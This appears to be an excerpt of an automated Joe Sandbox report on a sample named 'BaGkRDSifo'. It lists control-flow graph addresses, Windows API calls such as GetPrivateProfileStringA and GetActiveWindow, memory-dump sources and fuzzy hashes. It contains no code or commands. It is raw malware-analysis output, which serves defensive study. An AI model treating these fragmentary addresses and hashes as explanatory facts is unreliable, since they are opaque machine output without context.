              • Executed
              • Not Executed
              control_flow_graph 1069 6ad3ee0-6ad3f45 1070 6ad442f-6ad4499 1069->1070 1071 6ad3f4b-6ad3f58 1069->1071 1075 6ad44a0-6ad44f8 1070->1075 1074 6ad3f5e-6ad3f68 1071->1074 1071->1075 1079 6ad44ff-6ad4557 1074->1079 1080 6ad3f6e-6ad3f78 1074->1080 1075->1079 1082 6ad455e-6ad45b6 1079->1082 1080->1082 1083 6ad3f7e-6ad3f88 1080->1083 1086 6ad45bd-6ad461b 1082->1086 1083->1086 1087 6ad3f8e-6ad3f96 1083->1087 1097 6ad4622-6ad465b 1086->1097 1096 6ad3f9c-6ad3fa0 1087->1096 1087->1097 1101 6ad3ff7-6ad404b call 6ad2c0c call 6ad2c1c GetCapture 1096->1101 1102 6ad3fa2-6ad3fd7 1096->1102 1150 6ad465d-6ad4668 1097->1150 1126 6ad404d-6ad4053 1101->1126 1127 6ad4054-6ad4062 1101->1127 1102->1101 1123 6ad3fd9-6ad3fe8 1102->1123 1123->1101 1139 6ad3fea-6ad3ff4 call 6ad2bfc 1123->1139 1126->1127 1128 6ad408e-6ad40c3 GetActiveWindow 1127->1128 1129 6ad4064-6ad4089 call 6ad2c2c 1127->1129 1134 6ad40cc-6ad40dd 1128->1134 1135 6ad40c5-6ad40cb 1128->1135 1129->1128 1142 6ad40ec 1134->1142 1143 6ad40df-6ad40ea 1134->1143 1135->1134 1139->1101 1149 6ad40ef-6ad4121 1142->1149 1143->1149 1158 6ad4136-6ad4159 1149->1158 1159 6ad4123-6ad4129 1149->1159 1150->1150 1155 6ad466a-6ad466b 1150->1155 1164 6ad415f-6ad4169 1158->1164 1165 6ad4221-6ad422b 1158->1165 1159->1158 1160 6ad412b-6ad4131 call 6ad2c38 1159->1160 1160->1158 1164->1165 1170 6ad416f-6ad41a2 1164->1170 1166 6ad422d-6ad4230 call 6ad48df 1165->1166 1167 6ad4236-6ad4259 1165->1167 1166->1167 1173 6ad425b-6ad425e 1167->1173 1174 6ad4261-6ad426f 1167->1174 1177 6ad41a8-6ad4217 1170->1177 1178 6ad4374-6ad4404 call 6ad2c38 1170->1178 1173->1174 1179 6ad42a5-6ad42b3 1174->1179 1180 6ad4271-6ad427f 1174->1180 1177->1165 1178->1070 1185 6ad42b5-6ad42c3 1179->1185 1186 6ad42d1-6ad42d8 1179->1186 1180->1179 1187 6ad4281-6ad42a3 call 6ad2c48 1180->1187 1185->1186 1194 6ad42c5-6ad42cc call 6ad2c48 1185->1194 1226 6ad42de call 6ada8af 1186->1226 1227 6ad42de call 6ada8c0 1186->1227 1187->1186 1192 6ad42e1-6ad42f1 1200 6ad4346-6ad4355 1192->1200 1201 6ad42f3-6ad42fd 1192->1201 1194->1186 1200->1178 1205 6ad42ff-6ad4312 call 6ad2c54 1201->1205 1206 6ad433b-6ad4340 1201->1206 1205->1206 1213 6ad4314-6ad4336 call 6ad2c64 1205->1213 1222 6ad4343 call bb812bc 1206->1222 1223 6ad4343 call bb81030 1206->1223 1224 6ad4343 call bb81040 1206->1224 1213->1206 1222->1200 1223->1200 1224->1200 1226->1192 1227->1192
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ActiveCaptureWindow
              • String ID: Hq$Hq$fXV
              • API String ID: 2424615356-273469375
              • Opcode ID: 2e0d430939a07e78976c7d90f5207d8c045ca958a8edb9db3e34f6f7f8d1b4e3
              • Instruction ID: 829bf2e07347dec719d8007be3b744a26ae41286c93c701723e60b74cb90ea8f
              • Opcode Fuzzy Hash: 2e0d430939a07e78976c7d90f5207d8c045ca958a8edb9db3e34f6f7f8d1b4e3
              • Instruction Fuzzy Hash: E8121C70E002088FDB65EFB5D554BAEB7F2AFC9200F24816AD506AB395DF349D42CB51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1670 6ad3ed0-6ad3f45 1672 6ad442f-6ad4499 1670->1672 1673 6ad3f4b-6ad3f58 1670->1673 1677 6ad44a0-6ad44f8 1672->1677 1676 6ad3f5e-6ad3f68 1673->1676 1673->1677 1681 6ad44ff-6ad4557 1676->1681 1682 6ad3f6e-6ad3f78 1676->1682 1677->1681 1684 6ad455e-6ad45b6 1681->1684 1682->1684 1685 6ad3f7e-6ad3f88 1682->1685 1688 6ad45bd-6ad461b 1684->1688 1685->1688 1689 6ad3f8e-6ad3f96 1685->1689 1699 6ad4622-6ad465b 1688->1699 1698 6ad3f9c-6ad3fa0 1689->1698 1689->1699 1703 6ad3ff7-6ad404b call 6ad2c0c call 6ad2c1c GetCapture 1698->1703 1704 6ad3fa2-6ad3fd7 1698->1704 1752 6ad465d-6ad4668 1699->1752 1728 6ad404d-6ad4053 1703->1728 1729 6ad4054-6ad4062 1703->1729 1704->1703 1725 6ad3fd9-6ad3fe8 1704->1725 1725->1703 1741 6ad3fea-6ad3ff4 call 6ad2bfc 1725->1741 1728->1729 1730 6ad408e-6ad40c3 GetActiveWindow 1729->1730 1731 6ad4064-6ad4089 call 6ad2c2c 1729->1731 1736 6ad40cc-6ad40dd 1730->1736 1737 6ad40c5-6ad40cb 1730->1737 1731->1730 1744 6ad40ec 1736->1744 1745 6ad40df-6ad40ea 1736->1745 1737->1736 1741->1703 1751 6ad40ef-6ad4121 1744->1751 1745->1751 1760 6ad4136-6ad4159 1751->1760 1761 6ad4123-6ad4129 1751->1761 1752->1752 1757 6ad466a-6ad466b 1752->1757 1766 6ad415f-6ad4169 1760->1766 1767 6ad4221-6ad422b 1760->1767 1761->1760 1762 6ad412b-6ad4131 call 6ad2c38 1761->1762 1762->1760 1766->1767 1772 6ad416f-6ad41a2 1766->1772 1768 6ad422d-6ad4230 call 6ad48df 1767->1768 1769 6ad4236-6ad4259 1767->1769 1768->1769 1775 6ad425b-6ad425e 1769->1775 1776 6ad4261-6ad426f 1769->1776 1779 6ad41a8-6ad4217 1772->1779 1780 6ad4374-6ad4404 call 6ad2c38 1772->1780 1775->1776 1781 6ad42a5-6ad42b3 1776->1781 1782 6ad4271-6ad427f 1776->1782 1779->1767 1780->1672 1787 6ad42b5-6ad42c3 1781->1787 1788 6ad42d1-6ad42d8 1781->1788 1782->1781 1789 6ad4281-6ad42a3 call 6ad2c48 1782->1789 1787->1788 1796 6ad42c5-6ad42cc call 6ad2c48 1787->1796 1827 6ad42de call 6ada8af 1788->1827 1828 6ad42de call 6ada8c0 1788->1828 1789->1788 1794 6ad42e1-6ad42f1 1802 6ad4346-6ad4355 1794->1802 1803 6ad42f3-6ad42fd 1794->1803 1796->1788 1802->1780 1807 6ad42ff-6ad4312 call 6ad2c54 1803->1807 1808 6ad433b-6ad4340 1803->1808 1807->1808 1815 6ad4314-6ad4336 call 6ad2c64 1807->1815 1824 6ad4343 call bb812bc 1808->1824 1825 6ad4343 call bb81030 1808->1825 1826 6ad4343 call bb81040 1808->1826 1815->1808 1824->1802 1825->1802 1826->1802 1827->1794 1828->1794
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ActiveCaptureWindow
              • String ID: fXV
              • API String ID: 2424615356-3172339192
              • Opcode ID: 0a285953b8622942b4a011e4b292e4e607de47ca10f2cf20db7baf7dff6595a8
              • Instruction ID: 17cfc8f741ab1bfacafe9f4ff83c6d5751e8332c8a2bf18038cedef564bb3563
              • Opcode Fuzzy Hash: 0a285953b8622942b4a011e4b292e4e607de47ca10f2cf20db7baf7dff6595a8
              • Instruction Fuzzy Hash: BFD11B75E00208CFDB65EFB5CA44A9DBBF1EF89304F258269E506AB251DB31A985CF10
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID: $(&q$(q$Hq
              • API String ID: 0-2282635851
              • Opcode ID: 35ba06cced9c62c67081c5ff5262090d583a087952cfe32b402e17052a53b612
              • Instruction ID: 0ab928c348ec42edb9cf99d1e3a9ce3283ed16543f668d831b3b2c88f0b08d13
              • Opcode Fuzzy Hash: 35ba06cced9c62c67081c5ff5262090d583a087952cfe32b402e17052a53b612
              • Instruction Fuzzy Hash: 4A918F71E002199FDB18DF75D854AAFBBF6EFC8B10F24842AE405EB254DB359941CBA0
              APIs
              • GetSysColorBrush.USER32(00000000), ref: 0B33B91F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID: BrushColor
              • String ID: fXV
              • API String ID: 464657469-3172339192
              • Opcode ID: cbb3c8d6a5f5903df9f447b0b746c1f642753d270536e5c4bb2cfb94cbac0659
              • Instruction ID: fcb17903c898e875af6f2e9b894e42ce59ec618797cf7acd8a0cc7787d89a12a
              • Opcode Fuzzy Hash: cbb3c8d6a5f5903df9f447b0b746c1f642753d270536e5c4bb2cfb94cbac0659
              • Instruction Fuzzy Hash: 2D322835900619CFCB21DF64C994BDAF7B1FF89700F1585E9E409AB261EB71AA85CF40
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID: fXV
              • API String ID: 0-3172339192
              • Opcode ID: 3c8010318f0af0f7eb92b3081bdcd26ee5730996bb9b0d7baf8f244724f094db
              • Instruction ID: a71d1e2fd904bacb459e418bdd7b414fc12ad87566348d7208ce41f7ea9621ac
              • Opcode Fuzzy Hash: 3c8010318f0af0f7eb92b3081bdcd26ee5730996bb9b0d7baf8f244724f094db
              • Instruction Fuzzy Hash: 0CF12834E002099FDB24DFA9C964BADBBF2BF88314F158559E405AF2A5DB70E945CF80
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID: PHq$`Qq
              • API String ID: 0-577899614
              • Opcode ID: dae5e96532b877ce796ac8f3d7925d9b3a8b36b467959294c7b315e83c3e60f7
              • Instruction ID: 84c0d2df045b88a066e96286940f1df09c70ed93d2e5871a43e259ce48dfaac5
              • Opcode Fuzzy Hash: dae5e96532b877ce796ac8f3d7925d9b3a8b36b467959294c7b315e83c3e60f7
              • Instruction Fuzzy Hash: 8E713931E042298FEF259F64D8487A9BBB2EF88301F0545EAD80AE7780DB759D91CF45
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID: fff?
              • API String ID: 0-4136771917
              • Opcode ID: a9c21eb4956dfbc969fac30a9cdc18b8298702111b200c42c0ed41805c4867f5
              • Instruction ID: 9a603144a61f4dbb9fbd3a309ade8a07e92c00d3820aba8a680177b1b6912be4
              • Opcode Fuzzy Hash: a9c21eb4956dfbc969fac30a9cdc18b8298702111b200c42c0ed41805c4867f5
              • Instruction Fuzzy Hash: 4D62083680061ADFCF11DF60C884ADAB7B2FF99300F1586D5E9086B165EB71AAD5CF80
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID: LRq
              • API String ID: 0-3187445251
              • Opcode ID: 71b428a174a105573266d89330bb2cacfcbcd6d7790f439eabcd68af07eea2be
              • Instruction ID: b8ff0eded3c3c2df6f2fb46e8a22f39b59bf84114414f233f86b9bad411cc0a6
              • Opcode Fuzzy Hash: 71b428a174a105573266d89330bb2cacfcbcd6d7790f439eabcd68af07eea2be
              • Instruction Fuzzy Hash: 8932FA74A002188FDB58DF29C865BDE77F2AF88700F1481E9D50A9B395DF349D828FA1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID: 4'q
              • API String ID: 0-1807707664
              • Opcode ID: b4686c1a3f9f743c28693ec5ab2ca712c46dce824dfb119cef897f61bcba3fab
              • Instruction ID: 6e3dca2c48a7911f5392889e24d965a71aa0e4270ae8979c067128fb28fbcc6a
              • Opcode Fuzzy Hash: b4686c1a3f9f743c28693ec5ab2ca712c46dce824dfb119cef897f61bcba3fab
              • Instruction Fuzzy Hash: 3B42D734A002188FCB18DF24C999FE9B7F2BF89705F1541E9E509AB365DA31AD81CF61
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID: 0-3916222277
              • Opcode ID: 47735db7364dee63f970e12d18f4851f639b9321d6fc707c8485911f9060376c
              • Instruction ID: 805e4da179f7d286c930c0113ad0580b04b6fd1b5f8ba16cc4869ec8f5df7e68
              • Opcode Fuzzy Hash: 47735db7364dee63f970e12d18f4851f639b9321d6fc707c8485911f9060376c
              • Instruction Fuzzy Hash: 69020A31E103198FDB54EFA4C864B9DB7B6AF88300F10869AD519BB291DF70AE85CF50
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 479fa588c5d0e0efe487b7c49f03b61fc6bcf8c278eb45548918d3c1bd43a6ec
              • Instruction ID: b308d8b1f7de8f6ff58d97e2a9a43a1368f40cba10064a160143c0886c21f9f8
              • Opcode Fuzzy Hash: 479fa588c5d0e0efe487b7c49f03b61fc6bcf8c278eb45548918d3c1bd43a6ec
              • Instruction Fuzzy Hash: FF523835A00619CFCB25DF65C844AEAB7B1FF49700F2586D9E419AB261EB31EE85CF40
              Memory Dump Source
              • Source File: 00000000.00000002.2493230237.000000000BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BB80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_bb80000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e9eea3dbad69d6de8f1cb702cf79304b4d64bd2152fcb073dafaa403f3d1d34
              • Instruction ID: 22455c2e79e56e0795dac2b829454ed6d8d32975d3d222758e83c39aa82474da
              • Opcode Fuzzy Hash: 7e9eea3dbad69d6de8f1cb702cf79304b4d64bd2152fcb073dafaa403f3d1d34
              • Instruction Fuzzy Hash: 32D19A71B006048FEB29EB75C550BAFB7F6EF89600F1444ADD15ADB2A0DB35E806CB61

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1228 5aacd38-5aacdc7 GetCurrentProcess 1232 5aacdc9-5aacdcf 1228->1232 1233 5aacdd0-5aace04 GetCurrentThread 1228->1233 1232->1233 1234 5aace0d-5aace41 GetCurrentProcess 1233->1234 1235 5aace06-5aace0c 1233->1235 1237 5aace4a-5aace65 call 5aacf07 1234->1237 1238 5aace43-5aace49 1234->1238 1235->1234 1240 5aace6b-5aace9a GetCurrentThreadId 1237->1240 1238->1237 1242 5aace9c-5aacea2 1240->1242 1243 5aacea3-5aacf05 1240->1243 1242->1243
              APIs
              • GetCurrentProcess.KERNEL32 ref: 05AACDB6
              • GetCurrentThread.KERNEL32 ref: 05AACDF3
              • GetCurrentProcess.KERNEL32 ref: 05AACE30
              • GetCurrentThreadId.KERNEL32 ref: 05AACE89
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: Current$ProcessThread
              • String ID: fXV
              • API String ID: 2063062207-3172339192
              • Opcode ID: e1b9fb6a6a9df995ff8d7e79a73d3c6a2fa6cb2d3c5d0c6e82a65883fa4c6629
              • Instruction ID: 8ed2d1713cd4512fd5bf239c1edf37b9c6e531aa4858065431cf3b08eadb0d78
              • Opcode Fuzzy Hash: e1b9fb6a6a9df995ff8d7e79a73d3c6a2fa6cb2d3c5d0c6e82a65883fa4c6629
              • Instruction Fuzzy Hash: D15127B1D003498FEB14DFAAD648BAEBBF1BF88314F24845AE019A7361D7346944CF65

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1250 5aacd28-5aacdc7 GetCurrentProcess 1254 5aacdc9-5aacdcf 1250->1254 1255 5aacdd0-5aace04 GetCurrentThread 1250->1255 1254->1255 1256 5aace0d-5aace41 GetCurrentProcess 1255->1256 1257 5aace06-5aace0c 1255->1257 1259 5aace4a-5aace65 call 5aacf07 1256->1259 1260 5aace43-5aace49 1256->1260 1257->1256 1262 5aace6b-5aace9a GetCurrentThreadId 1259->1262 1260->1259 1264 5aace9c-5aacea2 1262->1264 1265 5aacea3-5aacf05 1262->1265 1264->1265
              APIs
              • GetCurrentProcess.KERNEL32 ref: 05AACDB6
              • GetCurrentThread.KERNEL32 ref: 05AACDF3
              • GetCurrentProcess.KERNEL32 ref: 05AACE30
              • GetCurrentThreadId.KERNEL32 ref: 05AACE89
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: Current$ProcessThread
              • String ID: fXV
              • API String ID: 2063062207-3172339192
              • Opcode ID: d1d734b077bf54d51ea486ec754b44e8cb5e3e124dac4c63d73623caa78e37dd
              • Instruction ID: e393841ace76b9c24d82004fa68da45df482e2989c1fa960d4b4f242f23d1abe
              • Opcode Fuzzy Hash: d1d734b077bf54d51ea486ec754b44e8cb5e3e124dac4c63d73623caa78e37dd
              • Instruction Fuzzy Hash: 115166B09003498FEB15CFA9E648B9EBBF1BF48314F20845AE019AB361D7346944CB69
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID: fXV
              • API String ID: 0-3172339192
              • Opcode ID: 1e43268daa2dd7fe1f9de18688b4609acab440f5d2f0c8f2aafd881192c12db4
              • Instruction ID: 40350169b634a303e7f02ef1afd83e495407b130e21ce24e0f611a1d12438f38
              • Opcode Fuzzy Hash: 1e43268daa2dd7fe1f9de18688b4609acab440f5d2f0c8f2aafd881192c12db4
              • Instruction Fuzzy Hash: E8225D74F08605CFDF54DB58C58ADBEBBB2BB88318F248456F926AB364C7349881CB51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1638 4018f0-4018fa 1639 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 1638->1639 1640 4018fc-401900 1638->1640 1643 401940-401949 GetLastError 1639->1643 1644 401996-40199a 1639->1644 1645 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 1643->1645 1646 40198d-40198f 1643->1646 1645->1646 1646->1644 1648 401991 call 401030 1646->1648 1648->1644
              APIs
              • lstrlenA.KERNEL32(?), ref: 00401906
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
              • GetLastError.KERNEL32 ref: 00401940
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ByteCharMultiWide$ErrorLastlstrlen
              • String ID:
              • API String ID: 3322701435-0
              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
              • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
              • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1651 40af66-40af6e 1652 40af7d-40af88 call 40b84d 1651->1652 1655 40af70-40af7b call 40d2e3 1652->1655 1656 40af8a-40af8b 1652->1656 1655->1652 1659 40af8c-40af98 1655->1659 1660 40afb3-40afca call 40af49 call 40cd39 1659->1660 1661 40af9a-40afb2 call 40aefc call 40d2bd 1659->1661 1661->1660
              APIs
              • _malloc.LIBCMT ref: 0040AF80
                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
              • String ID:
              • API String ID: 1411284514-0
              • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
              • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
              • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
              • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1830 6addd8c-6adde17 1833 6adde19-6adde23 1830->1833 1834 6adde50-6adde70 1830->1834 1833->1834 1835 6adde25-6adde27 1833->1835 1839 6addea9-6addec9 1834->1839 1840 6adde72-6adde7c 1834->1840 1837 6adde29-6adde33 1835->1837 1838 6adde4a-6adde4d 1835->1838 1841 6adde35 1837->1841 1842 6adde37-6adde46 1837->1842 1838->1834 1850 6addecb-6added5 1839->1850 1851 6addf02-6addf24 1839->1851 1840->1839 1844 6adde7e-6adde80 1840->1844 1841->1842 1842->1842 1843 6adde48 1842->1843 1843->1838 1845 6addea3-6addea6 1844->1845 1846 6adde82-6adde8c 1844->1846 1845->1839 1848 6adde8e 1846->1848 1849 6adde90-6adde9f 1846->1849 1848->1849 1849->1849 1853 6addea1 1849->1853 1850->1851 1852 6added7-6added9 1850->1852 1859 6addf26-6addf4a 1851->1859 1860 6addf92-6addf96 1851->1860 1854 6addefc-6addeff 1852->1854 1855 6addedb-6addee5 1852->1855 1853->1845 1854->1851 1857 6addee9-6addef8 1855->1857 1858 6addee7 1855->1858 1857->1857 1861 6addefa 1857->1861 1858->1857 1868 6addf4c-6addf4e 1859->1868 1869 6addf7a-6addf7f 1859->1869 1862 6addf98-6addfd6 1860->1862 1863 6addfda-6addfea 1860->1863 1861->1854 1862->1863 1865 6addfec-6addff9 1863->1865 1866 6ade026-6ade02c 1863->1866 1865->1866 1870 6addffb-6addffd 1865->1870 1873 6ade036-6ade08e GetPrivateProfileStringA 1866->1873 1874 6addf70-6addf78 1868->1874 1875 6addf50-6addf5a 1868->1875 1878 6addf81-6addf8d 1869->1878 1871 6addfff-6ade009 1870->1871 1872 6ade020-6ade023 1870->1872 1876 6ade00d-6ade01c 1871->1876 1877 6ade00b 1871->1877 1872->1866 1881 6ade097-6ade0a8 1873->1881 1882 6ade090-6ade096 1873->1882 1874->1878 1883 6addf5c 1875->1883 1884 6addf5e-6addf6c 1875->1884 1876->1876 1886 6ade01e 1876->1886 1877->1876 1878->1860 1887 6ade0be-6ade0e5 1881->1887 1888 6ade0aa-6ade0b6 1881->1888 1882->1881 1883->1884 1884->1884 1885 6addf6e 1884->1885 1885->1874 1886->1872 1892 6ade0f5-6ade0f9 1887->1892 1893 6ade0e7-6ade0eb 1887->1893 1888->1887 1896 6ade109-6ade10d 1892->1896 1897 6ade0fb-6ade0ff 1892->1897 1893->1892 1895 6ade0ed 1893->1895 1895->1892 1900 6ade11d-6ade121 1896->1900 1901 6ade10f-6ade113 1896->1901 1897->1896 1899 6ade101 1897->1899 1899->1896 1903 6ade131-6ade135 1900->1903 1904 6ade123-6ade127 1900->1904 1901->1900 1902 6ade115 1901->1902 1902->1900 1905 6ade145 1903->1905 1906 6ade137-6ade13b 1903->1906 1904->1903 1907 6ade129 1904->1907 1909 6ade146 1905->1909 1906->1905 1908 6ade13d 1906->1908 1907->1903 1908->1905 1909->1909
              APIs
              • GetPrivateProfileStringA.KERNEL32(?,?,?,00000000,?,?), ref: 06ADE07E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: PrivateProfileString
              • String ID: fXV$fXV
              • API String ID: 1096422788-1107164591
              • Opcode ID: 74d9b95b8566a06e6893fa6b289bf7f0f34e60f827e158189b5dab81d22c3eee
              • Instruction ID: 1221579ea9a54804595438c2b22b8364826fa2e27fadd49d187743503905219b
              • Opcode Fuzzy Hash: 74d9b95b8566a06e6893fa6b289bf7f0f34e60f827e158189b5dab81d22c3eee
              • Instruction Fuzzy Hash: 71C19070D002198FDB54EFA9C8857AEFBF2FF49300F148529E856EB284DB749981CB91

              Control-flow Graph

              • Executed
              • Not Executed
